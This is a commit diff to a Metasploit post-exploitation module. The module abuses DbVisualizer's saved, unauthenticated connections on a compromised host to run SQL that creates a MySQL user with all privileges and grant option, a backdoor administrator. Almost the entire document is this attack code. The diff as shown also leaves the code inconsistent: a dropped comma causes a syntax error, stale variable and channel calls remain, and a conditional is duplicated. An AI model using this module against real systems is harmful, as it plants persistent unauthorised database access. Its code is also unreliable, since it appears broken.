Update dbvis_add_db_admin.rb

Corrections
2014-07-16 13:42:58 +02:00 · 2014-07-16 13:42:58 +02:00 · b602fc89a3
parent 875c024243
commit b602fc89a3
1 changed files with 80 additions and 86 deletions
--- a/modules/post/multi/manage/dbvis_add_db_admin.rb
+++ b/modules/post/multi/manage/dbvis_add_db_admin.rb
@ -13,11 +13,12 @@ class Metasploit3 < Msf::Post
  def initialize(info={})
    super( update_info( info,
-        'Name'          => 'Multi manage Dbvis add remote admin',
+        'Name'          => 'Multi Manage Dbvis Add Db Admin',
        'Description'   => %q{
           Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases (With GUI).
           The remote database can be accessed from the command line without the need to authenticate.
           The module abuses this functionality to create an administrator in the database if DB user rights allow it.
           Supported databases : mysql (More supported soon)
        },
        'License'       => MSF_LICENSE,
        'Author'        => [ 'David Bloom' ], # Twitter: @philophobia78
@ -28,19 +29,18 @@ class Metasploit3 < Msf::Post
      [
      OptString.new('DBALIAS', [true,'Use dbvis_enum module to find out databases and aliases', 'localhost']),
      OptString.new('DBUSERNAME', [true,'The user you want to add to the remote database', 'msf']),
-      OptString.new('DBPASSWORD', [true,'User password to set', 'msfRocks']),
+      OptString.new('DBPASSWORD', [true,'User password to set', 'msfRocks'])
      OptBool.new('VERBOSE', [ true , 'Print sql response', false]),
      ], self.class)
  end
  def run
-   dbType = existAndSupported()
+   db_type = exist_and_supported()
-   unless dbType.nil?
+   unless db_type.blank?
-     dbvis = findDbviscmd()
+     dbvis = find_dbviscmd()
-     unless dbvis.nil?
+     unless dbvis.blank?
-       sql = getSQL(dbType)
+       sql = get_sql(db_type)
-       errors = dbvisQuery(dbvis,sql)
+       errors = dbvis_query(dbvis,sql)
       if errors == true
         print_error("No luck today, access is probably denied for configured user !? Try in verbose mode to know what happened. ")
       else
@ -51,12 +51,11 @@ class Metasploit3 < Msf::Post
  end
  # Check if the alias exist and if database is supported by this script
-  def existAndSupported()
+  def exist_and_supported()
    case session.platform
    when /linux/
-      user = session.shell_command("whoami").chomp
+      user = session.shell_command("whoami")
-      print_status("Current user is " + user)
+      print_status("Current user is #{user}")
      if (user =~ /root/)
        user_base = "/root/"
      else
@ -65,7 +64,7 @@ class Metasploit3 < Msf::Post
      dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml"
    when /win/
      user_profile = session.sys.config.getenv('USERPROFILE')
-      dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml"
+      dbvis_file = "#{user_profile}\\.dbvis\\config70\\dbvis.xml"
    end
    unless file?(dbvis_file)
@ -74,18 +73,18 @@ class Metasploit3 < Msf::Post
      print_status("This could be an older version of dbvis, trying old path")
      case session.platform
      when /linux/
-      	dbvis_file = user_base + ".dbvis/config/dbvis.xml"
+        dbvis_file = "#{user_base}.dbvis/config/dbvis.xml"
      when /win/
-      	dbvis_file = user_profile + "\\.dbvis\\config\\dbvis.xml"
+        dbvis_file = "#{user_profile }\\.dbvis\\config\\dbvis.xml"
      end
      unless file?(dbvis_file)
-        print_error("File not found: " + dbvis_file)
+        print_error("File not found: #{dbvis_file}")
        return
      end
-      oldversion= true
+      old_version= true
    end
-    print_status("Reading: " + dbvis_file )   
+    print_status("Reading : #{dbvis_file}" )
    raw_xml = ""
    begin
      raw_xml = read_file(dbvis_file)
@ -95,75 +94,75 @@ class Metasploit3 < Msf::Post
      return
    end
-    dbfound=false
+    db_found=false
-    aliasFound=false
+    alias_found=false
-    dbType=nil
+    db_type=nil
-    dbTypeOk=false
+    db_type_ok=false
    # fetch config file
    raw_xml.each_line do |line|
      if line =~ /<Database id=/
-        dbfound = true
+        db_found = true
      elsif line =~ /<\/Database>/
-        dbfound=false
+        db_found=false
      end
-      if dbfound == true
+      if db_found == true
        # checkthe alias
        if (line =~ /<Alias>([\S+\s+]+)<\/Alias>/i)
          if datastore['DBALIAS'] == $1
-            aliasFound = true
+            alias_found = true
            print_good("Alias #{datastore['DBALIAS']} found in dbvis.xml")
          end
        end
        if (line =~ /<Userid>([\S+\s+]+)<\/Userid>/i)
-          if aliasFound
+          if alias_found
-            print_good("Username for this connection : " + $1)
+            print_good("Username for this connection : #{$1}")
          end
        end
        # check the type
        if (line =~ /<Type>([\S+\s+]+)<\/Type>/i)
-          if aliasFound
+          if alias_found
-	    dbType = $1
+            db_type = $1
-	    dbTypeOk = checkDbType(dbType)
+            db_type_ok = check_db_type(db_type)
-            if dbTypeOk
+            if db_type_ok
-              print_good("Database #{dbType} is supported ")
+              print_good("Database #{db_type} is supported ")
            else
-              print_error("Database #{dbType} is not supported (yet)")
+              print_error("Database #{db_type} is not supported (yet)")
-              dbType=nil
+              db_type=nil
            end
-          aliasFound = false
+          alias_found = false
          end
        end
      end
    end
-    if dbType.nil? 
+    if db_type.blank?
      print_error("Database alias not found in dbvis.xml")
    end
-    return dbType   # That is empty if DB is not supported
+    return db_type   # That is empty if DB is not supported
  end
  # Find path to dbviscmd.sh|bat
-  def findDbviscmd
+  def find_dbviscmd
    case session.platform
    when /linux/
-      dbVis = session.shell_command("locate dbviscmd.sh").chomp
+      dbvis = session.shell_command("locate dbviscmd.sh").chomp
-      if dbVis.nil? or dbVis.chomp==""
+      if dbvis.chomp==""
        print_error("dbviscmd.sh not found")
        return nil
      else
-        print_good("Dbviscmd found : " + dbVis )
+        print_good("Dbviscmd found : #{dbvis}")
      end
    when /win/
      # Find program files
      progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
-      progfilesx86 = progfiles_env['ProgramFiles(X86)']
+      progfiles_x86 = progfiles_env['ProgramFiles(X86)']
-      if not progfilesx86.nil? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
+      if not progfiles_x86.blank? and progfiles_x86 !~ /%ProgramFiles\(X86\)%/
-        program_files = progfilesx86 # x64
+        program_files = progfiles_x86 # x64
      else
        program_files = progfiles_env['ProgramFiles'] # x86
      end
@ -171,63 +170,58 @@ class Metasploit3 < Msf::Post
      session.fs.dir.foreach(program_files) do |d|
        dirs << d
      end
-      dbvisHomeDir = nil
+      dbvis_home_dir = nil
      #Browse program content to find a possible dbvis home
      dirs.each do |d|
         if (d =~ /DbVisualizer[\S+\s+]+/i)
-           dbvisHomeDir=d
+           dbvis_home_dir=d
         end
      end
-      if  dbvisHomeDir.nil?
+      if  dbvis_home_dir.blank?
        print_error("Dbvis home not found, maybe uninstalled ?")
        return nil
      end
-      dbVis = program_files + "\\" + dbvisHomeDir + "\\dbviscmd.bat"
+      dbvis =  "#{program_files}\\#{dbvis_home_dir}\\dbviscmd.bat"
-      unless file?(dbVis)
+      unless file?(dbvis)
        print_error("dbviscmd.bat not found")
        return nil
      end
-      print_good("Dbviscmd found : " + dbVis )
+      print_good("Dbviscmd found : #{dbvis}")
    end
-    return dbVis
+    return dbvis
  end
  # Query execution method
-  def dbvisQuery(dbvis,sql)
+  def dbvis_query(dbvis,sql)
    error =false
    resp=''
-    #session.response_timeout=60
+    if file?(dbvis)==true
      print_status("Trying to execute evil sql, it can take time ...")
-    args = "-connection " + datastore['DBALIAS'] + " -sql \"" + sql + "\""
+      args = "-connection #{datastore['DBALIAS']} -sql \"#{sql}\""
-    dbvis="\"" + dbvis + "\"" 
+      dbvis ="\"#{dbvis}\""
-    resp = session.sys.process.execute(dbvis, args, {'Hidden' => true, 'Channelized' => true})
+      cmd = "#{dbvis} #{args}"
-    
+      resp = cmd_exec(cmd)
-    while(d = resp.channel.read)
+      vprint_line("")
-      if  datastore['VERBOSE'] == true
+      vprint_status("#{resp}")
-	print_status("#{d}")
+      if resp =~ /denied|failed/i
      end
      if d =~ /denied|failed/i 
          error = true
      end
    else
      print_error("#{dbvis} is not a file")
    end
    resp.channel.close
    resp.close
    return error
    rescue ::Exception => e
       print_error("Error Running Command: #{e.class} #{e}")
  end
  # Database dependent part
  # Check if db type is supported by this script
-  def checkDbType(type)
+  def check_db_type(type)
   return  type.to_s =~ /mysql/i
  end
  # Build proper sql
-  def getSQL(dbType)
+  def get_sql(db_type)
-    
+    if db_type =~ /mysql/i
    if dbType =~ /mysql/i
       sql = "CREATE USER '#{datastore['DBUSERNAME']}'@'localhost' IDENTIFIED BY '#{datastore['DBPASSWORD']}';"
       sql += "GRANT ALL PRIVILEGES ON *.* TO '#{datastore['DBUSERNAME']}'@'localhost' WITH GRANT OPTION;"